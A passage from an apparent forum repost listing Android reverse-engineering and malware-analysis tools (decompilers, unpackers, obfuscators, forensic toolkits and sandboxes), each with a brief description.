codes of “.class” files » JEB Decompiler - The Interactive Android Decompiler » Luyten - Java Decompiler Gui for Procyon » Radare - The reverse engineering framework » Redexer - A Dalvik bytecode instrumentation framework » Reverse Android - Reverse-engineering tools for Android applications » Scalpel - A surgical debugging tool to uncover the layers under your app » Smali - An assembler/disassembler for Android's dex format » Soot - Java Optimization Framework » STAMP - STatic Analysis of Mobile Programs » Systrace - Analyze the performance capturing and displaying execution times of your applications and other Android system processes » TaintDroid - Tracking how apps use sensitive information required » Traceview - Graphical viewer for execution logs saved by your application » Undx - Bytecode translator » Xenotix-APK-Decompiler - APK decompiler powered by dex2jar and JAD » XML-apk-parser - Print AndroidManifest.xml directly from apk file » ZjDroid - Android app dynamic reverse tool based on Xposed framework UNPACKERS » Android Unpacker - Android Unpacker presented at Defcon 22 - Android Hacker Protection Level 0 » Dehoser - Unpacker for the HoseDex2Jar APK Protection which packs the original file inside the dex header » Kisskiss - Unpacker for various Android packers/protectors PACKERS / OBFUSCATORS » Allatori » APKfuscator - A generic DEX file obfuscator and munger » APKProtect » Bangcle » DexGuard - Optimizer and obfuscator for Android » HoseDex2Jar - Adds some instructions to the classes.dex file that Dex2Jar can not process » ProGuard - Shrinks, optimizes, and obfuscates the code by removing unused code and renaming classes, fields, and methods with semantically obscure names TOOLKITS » Android Malware Analysis Toolkit » APK Resource Toolkit » MobiSec » Open Source Android Forensics Toolkit » Santoku SANDBOXES » Android Sandbox » Anubis » APK Analyzer » AVCaesar » Droidbox » HackApp » Mobile Sandbox » SandDroid » VisualThreat [/TD] [/TR] [/TABLE] Sursa: http://www.nyxbone.com/malware/android_tools.html
×
×
  • Create New...